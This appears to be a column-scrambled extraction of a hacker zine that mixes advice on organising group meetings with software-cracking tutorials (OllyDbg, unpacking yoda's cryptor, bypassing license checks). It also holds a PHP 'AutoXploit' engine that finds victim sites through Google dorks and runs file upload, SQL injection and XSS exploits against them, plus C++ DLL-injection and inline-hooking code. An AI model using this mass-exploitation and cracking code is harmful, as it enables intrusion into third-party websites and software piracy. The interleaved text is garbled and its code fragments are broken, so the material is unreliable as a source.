freeze enough people have showed, it’s time for the formal meeting. -)A brain ies, or college campuses would be ideal as these are likely to contain execution once we get there (so we can see how the cryptostring is decrypt- the greatest concentration of potential members. ed).Now press F9 and GO! Watch the dump an Voilá, we got it ROund table meetings are usually the best way for everybody to You can either try to crack each app first and read my tutorial afterwards or just follow along, you choice. Each Act is given an “objective” so you know Next, try to find a space or room to hold the actual meetings. For hear each other and create a friendly equal and open environment what to look for and what you can learn there (all passwords are normal 004013CF |. 81C1 10304400 |ADD ECX,Cp1.00443010 ; open meetings it would have to be in a public place (or a friendly for new people to introduce new ideas. If there are a lot of people or words,eg. no Ae534RKLjl passwords but SOMEPASSWORD). ASCII “EXTORTION” commercial location). At a minimum , it would have to be big enough a lot of things that need to be discussed then a meeting facilitator for tables and chairs for a dozen people, with access to power, in- and an agenda is probably needed. So announce that the meeting is starting, circle up chairs + tables so everyone can face each other Act I: Act IV: ternet, and room to set up networks and other equipment. Some Difficulity: Medium possible locations would be public libraries, college campuses, art/ and be in on the discussion and start with introductions. Go around Difficulity: [....] the room and give everybody a chance to introduce themselves + Tools: OllyDbg Tools: OllyDbg activist spaces or coops, friendly internet cafes, infoshops, commu- Objective: Find the password or find hash-collision nity centers, etc. Some groups have had success with meeting at a their skills and interests. Afterwards, create time to brainstorm items Objective: Find the password to be discussed and added to the agenda (useful for the facilitator or coffee hop especially ones located at major transportation centers Instead of reducing the absurdly high price of “LameGame” MegaCorp gave convenient for people taking the train. The first few meetings can be notetaker). Then go over each agenda item one by one bringing up Ok, imagine you just downloaded a nice game (“LameGame V 1.0”) and issues proposing and deciding on ideas. you’re ready to enjoy playing it. You launch the bitch and THIS jumps up: up it’s production because all they care about is profit and not their custom- just a temporary meetup spot until people can talk about more ac- ers. But they just brought out a new product, a new firewall named “Infernal commodating or convenient locations for a more permanent meeting Barricade”. In order to install “Infernal Barricade” we need to bypass their space that you could send out public announcements. As it is your first meeting there are probably lots of agenda items LameGame V1.0 to bring up so the group can decide it’s identity, prioritize it’s goals, (c) MegaCorp 2006-2099 newest copyright scheme. Let’s take them on with OllyDbg once again... and brainstorm future ideas for growth. Think about points of unity Hmm... no strcmp anymore? That means they have though of something else When exploring possible spaces, talk to the management and in- than using a password. Let’s take a closer look. troduce yourself and the group you are starting. Explain it positively + strucure of the group (democracy, consensus, open, etc). What Usage: would be a good time/date/location for next meeting (monthly meet- cp1
$packet =”GET “.$q.” HTTP/1.0\r\n”; } targets later. } Requirement 1 is simple to complete, we’ll use the unlimited power $packet.=”Host: “.$host.”\r\n”; HANDLE hProcess; $packet.=”Connection: Close\r\n\r\n”; return 0; of google. Now I hear everyone mumbling “tskpscht google api tsk- $html = sendpacket($host,80,$packet); HMODULE hKernel; } pscht” but no worries, I don’t like the google API either (I actually don’t care if you like it at all, I just don’t like it). It is very easy to use $temp=explode(“ form hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, on, strcmp. Strcmp is a string comparing function located in the Dll ntdll. for ($i=1; $i<=count($temp)-1; $i++) { lowing concept: dwPID); // open the process if(hProcess == INVALID_ dll. The pause is used to ensure we get the time to inject our DLL into the $temp2=explode(“\”>”,$temp[$i]); HANDLE_VALUE) //couldn’t open? $targets[$targetcount] = $temp2[0]; // add to targets array { victim app. 1) Post a GET request to google.com with the following parameters: $targetcount++; } } } printf(“Couldn’t open process ‘%s’ Ok, we’ll hijack the function by using a detours trampoline. Detours patch- search?as_q=”.UrlEncode($searchquery).”&num=”.$sta with ID %d!\n”,ProcessName,dwPID); ing, as described in: http://research.microsoft.com/~galenh/Publications/ rtfromthisresult.”&hl=en The auto exploitation engine would look like this: return FALSE; HuntUsenixNt99.pdf } function AutoXploit() // exploit routine goes as follows: 2) Add the found targets to the $targets array. Check whether we { for ($l = 0; $l < count($dork); $l++) { hKernel = LoadLibrary(“kernel32.dll”); have reached too much queried results (we don’t want to stick to the for($i = 0; $i < count($dork[$l]; $i++) // all dorks of current subgroup (XSS,SQL //load kernel32.dll Here follows a small example in C++: same vuln forever now do we?) if so quit else goto step 1 injection,etc) { $targets = array(); if(hKernel == NULL)// couldn’t load? DWORD InlineHook(const char *Library, const char *FuncName, Well, the biggest dificullilty lies with requirement 2. We can devide all $targetcount = 0; { void *Function, unsigned char *backup) Google4Targets(“www.google.com”,$dork[$l][$i],100); // google them major and common webapp-vulns (we’ll only discuss webapp-vulns printf(“Couldn’t load Kernel32.dll!\n”); { if ($targetcount > $searchlimit) // not higher than limit CloseHandle(hProcess); DWORD addr = (DWORD)GetProcAddress(GetModuleHandl in this article) into 4 catogories: $targetcount = $searchlimit; return FALSE; e(Library), FuncName); for ($x = 0; $x < $targetcount; $x++) { } // Fetch function’s address 1)Unauthorized file uploading $targets[$x] = eregi_replace(“http://”, “”,$targets[$x]); BYTE jmp[6] = { 2)Local/Remote file inclusion $temp = explode(“/”,$targets[$x]); // deconstruct URL LoadLibraryAddr = (LPVOID)GetProcAddress(hKernel, 0xe9, $base = $temp[0]; 3)SQL injection “LoadLibraryA”);// fetch address of LoadLibraryA //jmp $extend = “/”; RemoteStr = (LPVOID)VirtualAllocEx(hProcess, 0x00, 0x00, 0x00, 0x00, //address 4)XSS for($r = 1; $r < count($temp)-1; $r++) { NULL, strlen(strHookDLL), MEM_RESERVE | MEM_COMMIT, PAGE_ 0xc3 // $extend .= $temp[$r].”/”; } READWRITE); // allocate memory size of argument retn if($l == 0) // UPLOAD So we’ll organize the exploits like this (in a matrix form): if(WriteProcessBytes(hProcess, (LPVOID)RemoteStr, }; $sploits[$l][$i]->Sploit($base,80,$extend,$shellname,$shellcontent); strHookDLL, strlen(strHookDLL)) == FALSE) // write it to mem- ReadProcessMemory(GetCurrentProcess(), (void*)addr, elseif($l == 1) // SQL ory backup, 6, 0); $Sploits = array(); $sploits[$l][$i]->Sploit($base,80,$extend,$sploits[$l][$i]->SQLQ,$user,$pass);}} } { // Read 6 bytes from address of hooked function from rooted $Sploits[0] = array(); // array of all file upload exploits } printf(“Couldn’t write to process process into backup $Sploits[0][0] = new WhateverExploit(); //etc,etc ‘%s’ memory!\n”,ProcessName);// failed? Well I hope this small article was usefull and gave you some insights CloseHandle(hProcess); DWORD calc = ((DWORD)Function - addr - 5); //((to)- Also we should manage all “googledorks” (google searchqueries to and/or Ideas. For sample code, please see the code that comes with (from)-5) find targets) like this (thus googledorks $dork[0][3] being the dork for this zine, it’s released under the GPL, but remember, i’m not respon- return FALSE; memcpy(&jmp[1], &calc, 4); //build trampoline WriteProcessMemory(GetCurrentProcess(), (void*)addr, jmp, $Sploits[0][3]). sible for any damage done by or coming forth from this code! } HANDLE hRemoteThread = CreateRemoteThread(hPr 6, 0); Since every exploit is different in concept and requires diffent param- Nomenumbra. ocess, NULL, 0, (LPTHREAD_START_ROUTINE)LoadLibraryAddr, // write the 6 bytes long trampoline to address of hooked function to current process hClient = accept(hSock, NULL, NULL); return 0; return addr; } Act VI: } Difficulity: Hard if(hClient != INVALID_SOCKET) This function resolves the address of the function to be hooked, and builds Tools: OllyDbg,PEiD,DeYoda (found here: http://xtaz3k.free.fr/decryptors/ { send(hSock, buffer, sizeof(buffer), 0); a trampoline as follows: Dy.ace) Objective: Get the MessageBox with the password to popup (the password IS int ret; closesocket(hSock); printf(“client accepted\n”); JMP <4 empty bytes for addres to jump to> encrypted and is not to be found in plaintext in the app, RETN you can also decrypt the password by hand since the ‘encryption’ is pathetic, WSACleanup(); but that way you’ll miss some valuable knowledge) while(ret = recv(hClient, buf, 512, 0)) return 0; the address to jump to (the hook) is resolved like this: { } Ok, there is this new IDE, called BulkIDE, you really wanna get your hands if(ret == SOCKET_ERROR) ((To)-(From)-5) == ((HookAddress)-(TargetAddress)-5) on, it is said to be quite nice, but the price tag is a ‘little’ high, $3000, outra- geous for such a simple IDE, so let’s crack the bitch. You managed to lay { ======printf(“%d\n”, WSAGetLastError()); the old address is backed up, to be able to unhook the function later (by your hands on the main installer executable, but you seem to be missing overwriting the trampoline with the original address). the installation CD, but hey, we should get this working without that stupid break; Conclusion: I hope to follow up this article with a subse- Ok, now let’s hijack our little app to make any password work: license .exe :) It is rumored though that the programmers behind this IDE are } quent one’s discussing frame pointer fans of “security through obscurity” meaning we can expect a lot of opaque else overwrites, frame based exception handler absuse, shell- int WINAPI strcmphook(const char* str1,const char* str2); // predicates (a function that evaluates to true or false and of which the outcome buf[ret] = 0; coding, and the parallel universe of prototype is known to the programmer on forehand, sometimes used as useless code that seems important or anti-debugging). } heap overflows. DWORD Faddr=0; // address } BYTE Fbackup[6]; // backup First of all we load up PeiD and check the app, result: Tools: DWORD InlineHook(const char *Library, const char *FuncName, closesocket(hClient); void *Function, unsigned char *backup) yoda’s cryptor 1.2 closesocket(hSock); [A] http://msdn.microsoft.com/vstudio/express/visualC/de- { fault.aspx DWORD addr = (DWORD)GetProcAddress(GetModuleHandl This is probably your first encounter with a packer/crypter. Many software e(Library), FuncName); these days (especially commercial software and malware) is packed/crypted WSACleanup(); - MSVC++ 2005 // Fetch function’s address return 0; BYTE jmp[6] = { to make reversing a tiny whiny bit harder and to reduce executable size. 0xe9, Yoda’s cryptor is quite a nice compressor/packer/crypter for PE files, but } [B] http://nasm.sourceforge.net/ //jmp it can be undone in a wink, just fire up DeYoda, load the app and GO! Fire - Netwide Assembler 0x00, 0x00, 0x00, 0x00, //address up PEiD again: 0xc3 // ======retn [C] http://www.ollydbg.de/ Nothing found * }; Clearly biting off more than it can chew in it’s call to recv. - OllyDbg Debugger ReadProcessMemory(GetCurrentProcess(), (void*)addr, backup, 6, 0); Nice, that’s what we wanna see. With just a little // Read 6 bytes from address of hooked function from rooted socketry you can take the offensive and make the ‘server’ [D] http://www.phenoelit.de/win/ process into backup Now fire up OllyDBG and load the unpacked executable. do whatever you want. - OllyUni, an OllyDbg plug-in DWORD calc = ((DWORD)Function - addr - 5); //((to)- We won’t start looking at all strings, cause they are too obvious to be real (from)-5) passwords, they’re just bogus shit to confuse the cracker. ======References: memcpy(&jmp[1], &calc, 4); //build trampoline The first thing we see is: WriteProcessMemory(GetCurrentProcess(), (void*)addr, jmp, 6, 0); 00401000 >/$ 68 0A204000 PUSH unpacked.0040200A; /FileName = #include
JMP/CALL
One way that we can do this is by using the OLLYUNI plug- #include